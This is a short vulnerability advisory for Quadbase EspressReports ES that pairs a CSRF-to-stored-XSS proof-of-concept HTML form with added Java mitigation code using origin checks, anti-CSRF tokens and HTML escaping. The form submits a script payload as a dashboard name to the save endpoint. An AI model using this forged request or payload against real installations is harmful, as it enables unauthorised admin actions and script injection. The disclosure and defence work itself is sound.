Quadbase – EspressReports ES – Version 7, Update 9 – Cross Site Request Forgery (CSRF) to Cross Site Scripting (XSS).
CSRF attacks can often lead to critical-risk outcomes such as privilege escalation via account takeover. They also allow completely unauthenticated attackers to use a target web application as if they were an admin, using features that would otherwise be inaccessible.
CSRF Proof of Concept:
<form action="http://X.X.X.X:8080/ERES/DashboardBuilder/DB_OverWriteDashboard.jsp?ActionButton=save">
  <input type="hidden" name="DashboardName" value="<script>alert(1)</script>" />
  <input type="hidden" name="SaveAgain" value="true" />
  <input type="hidden" name="OrganizerFolderList" value="9" />
  <input type="hidden" name="OrganizerNodePath" value="Examples" />
  <input type="submit" value="Submit request" />
</form>
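Mitigation example (added here; not Quadbase code and not part of the original advisory): one way a save endpoint can reject the forged request above and neutralise the DashboardName payload, using an Origin/Referer check, a per-session anti-CSRF token and HTML output encoding. The class and method names, the token mechanism and the hosts reports.example and other-site.example are assumptions made for illustration.

```java
import java.net.URI;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

// Added illustration: all names are hypothetical, not EspressReports ES code.
public class DashboardSaveGuard {
    // Per-session random token, embedded in the legitimate save form.
    static String newToken() {
        byte[] b = new byte[32];
        new SecureRandom().nextBytes(b);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(b);
    }
    // True only if Origin (or Referer, when Origin is absent) has the
    // same scheme, host and port as the application.
    static boolean sameOrigin(String origin, String referer, String expected) {
        String src = origin != null ? origin : referer;
        if (src == null) return false;
        try {
            URI u = URI.create(src), e = URI.create(expected);
            return u.getScheme() != null && u.getHost() != null
                && u.getScheme().equalsIgnoreCase(e.getScheme())
                && u.getHost().equalsIgnoreCase(e.getHost())
                && u.getPort() == e.getPort();
        } catch (IllegalArgumentException ex) { return false; }
    }
    // Constant-time comparison of the session token with the submitted one.
    static boolean tokenMatches(String sessionToken, String submitted) {
        if (sessionToken == null || submitted == null) return false;
        return MessageDigest.isEqual(sessionToken.getBytes(StandardCharsets.UTF_8),
                                     submitted.getBytes(StandardCharsets.UTF_8));
    }
    // Encode HTML metacharacters before DashboardName is written into a page.
    static String escapeHtml(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }
    public static void main(String[] args) {
        String app = "http://reports.example:8080"; // constructed stand-in for X.X.X.X:8080
        String token = newToken();
        // Constructed request shaped like the PoC: sent from another site, no token.
        boolean forged = sameOrigin("http://other-site.example", null, app)
                      && tokenMatches(token, null);
        // Constructed legitimate request: same origin, token echoed from the form.
        boolean genuine = sameOrigin(app, null, app) && tokenMatches(token, token);
        System.out.println("forged save allowed:  " + forged);
        System.out.println("genuine save allowed: " + genuine);
        System.out.println("rendered name: " + escapeHtml("<script>alert(1)</script>"));
    }
}
```

The request checks and the output encoding are independent layers: the first stops the cross-site write, the second keeps a stored dashboard name from executing as script wherever it is displayed.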